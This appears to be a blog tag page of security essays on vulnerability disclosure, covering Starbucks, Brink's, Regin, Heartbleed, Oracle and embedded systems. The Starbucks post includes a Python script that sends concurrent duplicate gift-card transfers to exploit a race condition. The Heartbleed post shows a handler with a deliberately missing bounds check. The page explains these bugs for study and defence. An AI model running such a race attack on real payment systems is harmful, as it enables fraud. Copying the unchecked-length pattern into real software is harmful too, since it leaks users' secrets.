Entries Tagged "disclosure"

Oracle CSO Rant Against Security Experts

Oracle’s CSO Mary Ann Davidson wrote a blog post ranting against security experts finding vulnerabilities in her company’s products. The blog post has been taken down by the company, but was saved for posterity by others. There’s been lots of commentary.

It’s easy to just mock Davidson’s stance, but it’s dangerous to our community. Yes, if researchers don’t find vulnerabilities in Oracle products, then the company won’t look bad and won’t have to patch things. But the real attackers—whether they be governments, criminals, or cyberweapons arms manufacturers who sell to governments and criminals—will continue to find vulnerabilities in her products. And while they won’t make a press splash and embarrass her, they will exploit them.

Posted on August 17, 2015 at 6:45 AM

Vulnerabilities in Brink's Smart Safe

Brink’s sells an Internet-enabled smart safe called the CompuSafe Galileo. Despite being sold as a more secure safe, it’s wildly insecure:

Vulnerabilities found in CompuSafe Galileo safes, smart safes made by the ever-reliable Brinks company that are used by retailers, restaurants, and convenience stores, would allow a rogue employee or anyone else with physical access to them to command their doors to open and relinquish their cash….

The hack has the makings of the perfect crime, because a thief could also erase any evidence that the theft occurred simply by altering data in a back-end database where the smartsafe logs how much money is inside and who accessed it.

Nothing about these vulnerabilities is a surprise to anyone who works in computer security:

But the safes have an external USB port on the side of the touchscreens that allows service technicians to troubleshoot and obtain a backup of the database. This, unfortunately, creates an easy entrypoint for thieves to take complete, administrative control of the devices.

“Once you’re able to plug into that USB port, you’re able to access lots of things that you shouldn’t normally be able to access,” Petro told WIRED. “There is a full operating system…that you’re able to…fully take over…and make [the safe] do whatever you want it to do.”

The researchers created a malicious script that, once inserted into a safe on a USB stick, lets a thief automatically open the safe doors by emulating certain mouse and keyboard actions and bypassing standard application controls. “You plug in this little gizmo, wait about 60 seconds, and the door just pops open,” says Petro.

If it sounds like the people who designed this e-safe ignored all of the things we’ve learned about computer security in the last few decades, you’re right. And that’s the problem with Internet-of-Things security: it’s often designed by people who don’t know computer or Internet security.

They also haven’t learned the lessons of full disclosure or rapid patching:

They notified Brinks about the vulnerabilities more than a year ago, but say the company appears to have done nothing to resolve the issues. Brinks could disable driver software associated with the USB port to prevent someone from controlling the safes in this way, or lock down the system and database so it’s not running in administrative mode and the database can’t be changed, but so far the company appears to have done none of these.

Again, this all sounds familiar. The computer industry learned its lessons over a decade ago. Before then they ignored security vulnerabilities, threatened researchers, and generally behaved very badly. I expect the same things to happen with Internet-of-Things companies.

Posted on August 3, 2015 at 1:27 PM

Race Condition Exploit in Starbucks Gift Cards

A researcher was able to steal money from Starbucks by exploiting a race condition in its gift card value-transfer protocol. Basically, by initiating two identical web transfers at once, he was able to trick the system into recording them both. Normally, you could take a $5 gift card and move that money to another $5 gift card, leaving you with an empty gift card and a $10 gift card. He was able to duplicate the transfer, giving him an empty gift card and a $15 gift card.
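To make the mechanics concrete, here is a minimal sketch of the attack pattern, with a hypothetical endpoint and field names rather than the real Starbucks API: fire the same transfer request twice at essentially the same instant, so that both requests are validated against the old balance before either one commits.

```python
# Hypothetical endpoint and field names, for illustration only.
import threading
import requests

TRANSFER_URL = "https://giftcards.example.com/transfer"
PAYLOAD = {"from_card": "CARD-A", "to_card": "CARD-B", "amount": "5.00"}
SESSION_COOKIES = {"session": "authenticated-session-token"}

def fire_transfer():
    # Each thread sends an identical value-transfer request.
    resp = requests.post(TRANSFER_URL, data=PAYLOAD, cookies=SESSION_COOKIES, timeout=10)
    print(resp.status_code, resp.text[:80])

# Launch both requests as close to simultaneously as possible.
threads = [threading.Thread(target=fire_transfer) for _ in range(2)]
for t in threads:
    t.start()
for t in threads:
    t.join()

# If the server checks card A's balance before either transfer commits (no row lock,
# transaction isolation, or idempotency key), both $5 transfers succeed, moving $10
# off a card that only ever held $5.
```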

Race-condition attacks are unreliable and it took him a bunch of tries to get it right, but there’s no reason to believe that he couldn’t have kept doing this forever.

Unfortunately, there was really no one at Starbucks he could tell this to:

The hardest part—responsible disclosure. Support guy honestly answered there’s absolutely no way to get in touch with technical department and he’s sorry I feel this way. Emailing InformationSecurityServices@starbucks.com on March 23 was futile (and it only was answered on Apr 29). After trying really hard to find anyone who cares, I managed to get this bug fixed in like 10 days.

The unpleasant part is a guy from Starbucks calling me with nothing like “thanks” but mentioning “fraud” and “malicious actions” instead. Sweet!

A little more from BBC News:

A spokeswoman for Starbucks told BBC News: “After this individual reported he was able to commit fraudulent activity against Starbucks, we put safeguards in place to prevent replication.”

The company did not answer questions about its response to Mr Homakov.

More info.

Posted on May 26, 2015 at 4:51 PM

Regin Malware

Last week, we learned about a striking piece of malware called Regin that has been infecting computer networks worldwide since 2008. It’s more sophisticated than any known criminal malware, and everyone believes a government is behind it. No country has taken credit for Regin, but there’s substantial evidence that it was built and operated by the United States.

This isn’t the first government malware discovered. GhostNet is believed to be Chinese. Red October and Turla are believed to be Russian. The Mask is probably Spanish. Stuxnet and Flame are probably from the U.S. All these were discovered in the past five years, and named by researchers who inferred their creators from clues such as who the malware targeted.

I dislike the “cyberwar” metaphor for espionage and hacking, but there is a war of sorts going on in cyberspace. Countries are using these weapons against each other. This affects all of us not just because we might be citizens of one of these countries, but because we are all potentially collateral damage. Most of the varieties of malware listed above have been used against nongovernment targets, such as national infrastructure, corporations, and NGOs. Sometimes these attacks are accidental, but often they are deliberate.

For their defense, civilian networks must rely on commercial security products and services. We largely rely on antivirus products from companies such as Symantec, Kaspersky, and F-Secure. These products continuously scan our computers, looking for malware, deleting it, and alerting us as they find it. We expect these companies to act in our interests, and never deliberately fail to protect us from a known threat.

This is why the recent disclosure of Regin is so disquieting. The first public announcement of Regin was from Symantec, on November 23. The company said that its researchers had been studying it for about a year, and announced its existence because they knew of another source that was going to announce it. That source was a news site, the Intercept, which described Regin and its U.S. connections the following day. Both Kaspersky and F-Secure soon published their own findings. Both stated that they had been tracking Regin for years. All three of the antivirus companies were able to find samples of it in their files dating back to 2008 or 2009.

So why did these companies all keep Regin a secret for so long? And why did they leave us vulnerable for all this time?

To get an answer, we have to disentangle two things. Near as we can tell, all the companies had added signatures for Regin to their detection database long before last month. The VirusTotal website has a signature for Regin as of 2011. Both Microsoft security and F-Secure started detecting and removing it that year as well. Symantec has protected its users against Regin since 2013, although it certainly added the VirusTotal signature in 2011.

Entirely separately and seemingly independently, all of these companies decided not to publicly discuss Regin’s existence until after Symantec and the Intercept did so. Reasons given vary. Mikko Hypponen of F-Secure said that specific customers asked him not to discuss the malware that had been found on their networks. Fox IT, which was hired to remove Regin from the Belgian phone company Belgacom’s networks, didn’t say anything about what it discovered because it “didn’t want to interfere with NSA/GCHQ operations.”

My guess is that none of the companies wanted to go public with an incomplete picture. Unlike criminal malware, government-grade malware can be hard to figure out. It’s much more elusive and complicated. It is constantly updated. Regin is made up of multiple modules—Fox IT called it “a full framework of a lot of species of malware”—making it even harder to figure out what’s going on. Regin has also been used sparingly, against only a select few targets, making it hard to get samples. When you make a press splash by identifying a piece of malware, you want to have the whole story. Apparently, no one felt they had that with Regin.

That is not a good enough excuse, though. As nation-state malware becomes more common, we will often lack the whole story. And as long as countries are battling it out in cyberspace, some of us will be targets and the rest of us might be unlucky enough to be sitting in the blast radius. Military-grade malware will continue to be elusive.

Right now, antivirus companies are probably sitting on incomplete stories about a dozen more varieties of government-grade malware. But they shouldn’t. We want, and need, our antivirus companies to tell us everything they can about these threats as soon as they know about them, and not wait until the release of a political story makes it impossible for them to remain silent.

This essay previously appeared in the MIT Technology Review.

Posted on December 8, 2014 at 7:19 AM

FOXACID Operations Manual

A few days ago, I saw this tweet: “Just a reminder that it is now *a full year* since Schneier cited it, and the FOXACID ops manual remains unpublished.” It’s true.

The citation is this:

According to a top-secret operational procedures manual provided by Edward Snowden, an exploit named Validator might be the default, but the NSA has a variety of options. The documentation mentions United Rake, Peddle Cheap, Packet Wrench, and Beach Head, all delivered from a FOXACID subsystem called Ferret Cannon.

Back when I broke the QUANTUM and FOXACID programs, I talked with the Guardian editors about publishing the manual. In the end, we decided not to, because the information in it wasn’t useful to understanding the story. It’s been a year since I’ve seen it, but I remember it being just what I called it: an operational procedures manual. It talked about what to type into which screens, and how to deal with error conditions. It didn’t talk about capabilities, either technical or operational. I found it interesting, but it was hard to argue that it was necessary in order to understand the story.

It will probably never be published. I lost access to the Snowden documents soon after writing that essay—Greenwald broke with the Guardian, and I have never been invited back by the Intercept—and there’s no one looking at the documents with an eye to writing about the NSA’s technical capabilities and how to securely design systems to protect against government surveillance. Even though we now know that the same capabilities are being used by other governments and cyber criminals, there’s much more interest in stories with political ramifications.

Posted on October 15, 2014 at 6:29 AM

The Human Side of Heartbleed

The announcement on April 7 was alarming. A new Internet vulnerability called Heartbleed could allow hackers to steal your logins and passwords. It affected a piece of security software that is used on half a million websites worldwide. Fixing it would be hard: It would strain our security infrastructure and the patience of users everywhere.

It was a software insecurity, but the problem was entirely human.

Software has vulnerabilities because it’s written by people, and people make mistakes—thousands of mistakes. This particular mistake was made in 2011 by a German graduate student who was one of the unpaid volunteers working on a piece of software called OpenSSL. The update was approved by a British consultant.

In retrospect, the mistake should have been obvious, and it’s amazing that no one caught it. But even though thousands of large companies around the world used this critical piece of software for free, no one took the time to review the code after its release.
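For readers who want to see the shape of the bug, here is a minimal, hypothetical Python sketch of the class of mistake involved. The real code is C inside OpenSSL’s TLS heartbeat handling, and the message layout here is simplified; the flaw is that the server echoes back as many bytes as the request claims to contain, without checking the claim against what actually arrived.

```python
import struct

def process_heartbeat(record: bytes, adjacent_memory: bytes) -> bytes:
    """Toy heartbeat handler: 2-byte big-endian claimed payload length, then the payload."""
    claimed_len = struct.unpack(">H", record[:2])[0]
    # Pretend the payload sits next to other data in the server's memory.
    buffer = record[2:] + adjacent_memory
    # BUG: no check that claimed_len <= len(record) - 2, so the reply can include
    # up to 64 KB of whatever happened to be nearby in memory.
    return buffer[:claimed_len]

def process_heartbeat_fixed(record: bytes, adjacent_memory: bytes) -> bytes:
    """The repaired behavior: silently discard heartbeats whose claimed length is a lie."""
    claimed_len = struct.unpack(">H", record[:2])[0]
    if claimed_len > len(record) - 2:   # the bounds check that was missing
        return b""
    return record[2:2 + claimed_len]

# An attacker sends 3 bytes of payload but claims 100:
evil = struct.pack(">H", 100) + b"hi!"
print(process_heartbeat(evil, adjacent_memory=b"...session keys, passwords, cookies..."))
```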

The mistake was discovered around March 21, 2014, and was reported on April 1 by Neel Mehta of Google’s security team, who quickly realized how potentially devastating it was. Two days later, in an odd coincidence, researchers at a security company called Codenomicon independently discovered it.

When a researcher discovers a major vulnerability in a widely used piece of software, he generally discloses it responsibly. Why? As soon as a vulnerability becomes public, criminals will start using it to hack systems, steal identities, and generally create mayhem, so we have to work together to fix the vulnerability quickly after it’s announced.

The researchers alerted some of the larger companies quietly so that they could fix their systems before the public announcement. (Who to tell early is another very human problem: If you tell too few, you’re not really helping, but if you tell too many, the secret could get out.) Then Codenomicon announced the vulnerability.

One of the biggest problems we face in the security community is how to communicate these sorts of vulnerabilities. The story is technical, and people often don’t know how to react to the risk. In this case, the Codenomicon researchers did well. They created a public website explaining (in simple terms) the vulnerability and how to fix it, and they created a logo—a red bleeding heart—that every news outlet used for coverage of the story.

The first week of coverage varied widely, as some people panicked and others downplayed the threat. This wasn’t surprising: There was a lot of uncertainty about the risk, and it wasn’t immediately obvious how disastrous the vulnerability actually was.

The major Internet companies were quick to patch vulnerable systems. Individuals were less likely to update their passwords, but by and large, that was OK.

True to form, hackers started exploiting the vulnerability within minutes of the announcement. We assume that governments also exploited the vulnerability while they could. I’m sure the U.S. National Security Agency had advance warning.

By now, it’s largely over. There are still lots of unpatched systems out there. (Many of them are embedded hardware systems that can’t be patched.) The risk of attack is still there, but minimal. In the end, the actual damage was also minimal, although the expense of restoring security was great.

The question that remains is this: What should we expect in the future—are there more Heartbleeds out there?

Yes. Yes there are. The software we use contains thousands of mistakes—many of them security vulnerabilities. Lots of people are looking for these vulnerabilities: Researchers are looking for them. Criminals and hackers are looking for them. National intelligence agencies in the United States, the United Kingdom, China, Russia, and elsewhere are looking for them. The software vendors themselves are looking for them.

What happens when a vulnerability is found depends on who finds it. If the vendor finds it, it quietly fixes it. If a researcher finds it, he or she alerts the vendor and then reports it to the public. If a national intelligence agency finds the vulnerability, it either quietly uses it to spy on others or—if we’re lucky—alerts the vendor. If criminals and hackers find it, they use it until a security company notices and alerts the vendor, and then it gets fixed—usually within a month.

Heartbleed was unique because there was no single fix. The software had to be updated, and then websites had to regenerate their encryption keys and get new public-key certificates. After that, people had to update their passwords. This multi-stage process had to take place publicly, which is why the announcement happened the way it did.
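As an illustration of the middle step, here is a sketch of regenerating a key pair and a certificate signing request with the widely used Python cryptography library; in practice most sites did this with the openssl command-line tool, and the domain name below is a placeholder.

```python
# Sketch of the "regenerate keys and request new certificates" step.
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

# 1. Generate a brand-new private key; the old one must be assumed compromised.
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

# 2. Build a certificate signing request (CSR) to submit to a certificate authority.
csr = (
    x509.CertificateSigningRequestBuilder()
    .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "www.example.com")]))
    .sign(key, hashes.SHA256())
)

# 3. Save both; the CA returns a new certificate, and the old one should be revoked.
with open("server.key", "wb") as f:
    f.write(key.private_bytes(
        serialization.Encoding.PEM,
        serialization.PrivateFormat.TraditionalOpenSSL,
        serialization.NoEncryption(),
    ))
with open("server.csr", "wb") as f:
    f.write(csr.public_bytes(serialization.Encoding.PEM))
```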

Yes, it’ll happen again. But most of the time, it’ll be easier to deal with than this.

This essay previously appeared on The Mark News.

Posted on June 4, 2014 at 6:23 AM

The Insecurity of Secret IT Systems

We now know a lot about the security of the Rapiscan 522 B x-ray system used to scan carry-on baggage in airports worldwide. Billy Rios, director of threat intelligence at Qualys, got himself one and analyzed it. And he presented his results at the Kaspersky Security Analyst Summit this week.

It’s worse than you might have expected:

It runs on the outdated Windows 98 operating system, stores user credentials in plain text, and includes a feature called Threat Image Projection used to train screeners by injecting .bmp images of contraband, such as a gun or knife, into a passenger carry-on in order to test the screener’s reaction during training sessions. The weak logins could allow a bad guy to project phony images on the X-ray display.

While this is all surprising, it shouldn’t be. These are the same sort of problems we saw in proprietary electronic voting machines, or computerized medical equipment, or computers in automobiles. Basically, whenever an IT system is designed and used in secret – either in actual secrecy or simply away from public scrutiny – the results are pretty awful.

I used to decry secret security systems as “security by obscurity.” I now say it more strongly: “obscurity means insecurity.”

Security is a process. For software, that process is iterative. It involves defenders trying to build a secure system, attackers—criminals, hackers, and researchers—defeating the security, and defenders improving their system. This is how all mass-market software improves its security. It’s the best system we have. And for systems that are kept out of the hands of the public, that process stalls. The result looks like the Rapiscan 522 B x-ray system.

Smart security engineers open their systems to public scrutiny, because that’s how they improve. The truly awful engineers will not only hide their bad designs behind secrecy, but try to belittle any negative security results. Get ready for Rapiscan to claim that the researchers had old software, and the new software has fixed all these problems. Or that they’re only theoretical. Or that the researchers themselves are the problem. We’ve seen it all before.

Posted on February 14, 2014 at 6:50 AM

Security Risks of Embedded Systems

We’re at a crisis point now with regard to the security of embedded systems, where computing is embedded into the hardware itself—as with the Internet of Things. These embedded computers are riddled with vulnerabilities, and there’s no good way to patch them.

It’s not unlike what happened in the mid-1990s, when the insecurity of personal computers was reaching crisis levels. Software and operating systems were riddled with security vulnerabilities, and there was no good way to patch them. Companies were trying to keep vulnerabilities secret, and not releasing security updates quickly. And when updates were released, it was hard—if not impossible—to get users to install them. This has changed over the past twenty years, due to a combination of full disclosure—publishing vulnerabilities to force companies to issue patches quicker—and automatic updates: automating the process of installing updates on users’ computers. The results aren’t perfect, but they’re much better than ever before.

But this time the problem is much worse, because the world is different: All of these devices are connected to the Internet. The computers in our routers and modems are much more powerful than the PCs of the mid-1990s, and the Internet of Things will put computers into all sorts of consumer devices. The industries producing these devices are even less capable of fixing the problem than the PC and software industries were.

If we don’t solve this soon, we’re in for a security disaster as hackers figure out that it’s easier to hack routers than computers. At a recent Def Con, a researcher looked at thirty home routers and broke into half of them—including some of the most popular and common brands.

To understand the problem, you need to understand the embedded systems market.

Typically, these systems are powered by specialized computer chips made by companies such as Broadcom, Qualcomm, and Marvell. These chips are cheap, and the profit margins slim. Aside from price, the way the manufacturers differentiate themselves from each other is by features and bandwidth. They typically put a version of the Linux operating system onto the chips, as well as a bunch of other open-source and proprietary components and drivers. They do as little engineering as possible before shipping, and there’s little incentive to update their “board support package” until absolutely necessary.

The system manufacturers—usually original device manufacturers (ODMs) who often don’t get their brand name on the finished product—choose a chip based on price and features, and then build a router, server, or whatever. They don’t do a lot of engineering, either. The brand-name company on the box may add a user interface and maybe some new features, make sure everything works, and they’re done, too.

The problem with this process is that no one entity has any incentive, expertise, or even ability to patch the software once it’s shipped. The chip manufacturer is busy shipping the next version of the chip, and the ODM is busy upgrading its product to work with this next chip. Maintaining the older chips and products just isn’t a priority.

And the software is old, even when the device is new. For example, one survey of common home routers found that the software components were four to five years older than the device. The minimum age of the Linux operating system was four years. The minimum age of the Samba file system software: six years. They may have had all the security patches applied, but most likely not. No one has that job. Some of the components are so old that they’re no longer being patched. This patching is especially important because security vulnerabilities are found “more easily” as systems age.

To make matters worse, it’s often impossible to patch the software or upgrade the components to the latest version. Often, the complete source code isn’t available. Yes, they’ll have the source code to Linux and any other open-source components. But many of the device drivers and other components are just “binary blobs”—no source code at all. That’s the most pernicious part of the problem: No one can possibly patch code that’s just binary.

Even when a patch is possible, it’s rarely applied. Users usually have to manually download and install relevant patches. But since users never get alerted about security updates, and don’t have the expertise to manually administer these devices, it doesn’t happen. Sometimes the ISPs have the ability to remotely patch routers and modems, but this is also rare.

The result is hundreds of millions of devices that have been sitting on the Internet, unpatched and insecure, for the last five to ten years.

Hackers are starting to notice. The DNSChanger malware attacks home routers as well as computers. In Brazil, 4.5 million DSL routers were compromised for purposes of financial fraud. Last month, Symantec reported on a Linux worm that targets routers, cameras, and other embedded devices.

This is only the beginning. All it will take is some easy-to-use hacker tools for the script kiddies to get into the game.

And the Internet of Things will only make this problem worse, as the Internet—as well as our homes and bodies—becomes flooded with new embedded devices that will be equally poorly maintained and unpatchable. But routers and modems pose a particular problem, because they’re (1) between users and the Internet, so turning them off is increasingly not an option; (2) more powerful and more general in function than other embedded devices; and (3) the one 24/7 computing device in the house, and a natural place for lots of new features.

We were here before with personal computers, and we fixed the problem. But disclosing vulnerabilities in an effort to force vendors to fix the problem won’t work the same way with embedded systems. The last time, the problem was computers, ones mostly not connected to the Internet, and slow-spreading viruses. The scale is different today: more devices, more vulnerability, viruses spreading faster on the Internet, and less technical expertise on both the vendor and the user sides. Plus vulnerabilities that are impossible to patch.

Combine full function with lack of updates, add in a pernicious market dynamic that has inhibited updates and prevented anyone else from updating, and we have an incipient disaster in front of us. It’s just a matter of when.

We simply have to fix this. We have to put pressure on embedded system vendors to design their systems better. We need open-source driver software—no more binary blobs!—so third-party vendors and ISPs can provide security tools and software updates for as long as the device is in use. We need automatic update mechanisms to ensure they get installed.

The economic incentives point to large ISPs as the driver for change. Whether they’re to blame or not, the ISPs are the ones who get the service calls for crashes. They often have to send users new hardware because it’s the only way to update a router or modem, and that can easily cost a year’s worth of profit from that customer. This problem is only going to get worse, and more expensive. Paying the cost up front for better embedded systems is much cheaper than paying the costs of the resultant security disasters.

This essay originally appeared on Wired.com.

Posted on January 9, 2014 at 6:33 AM
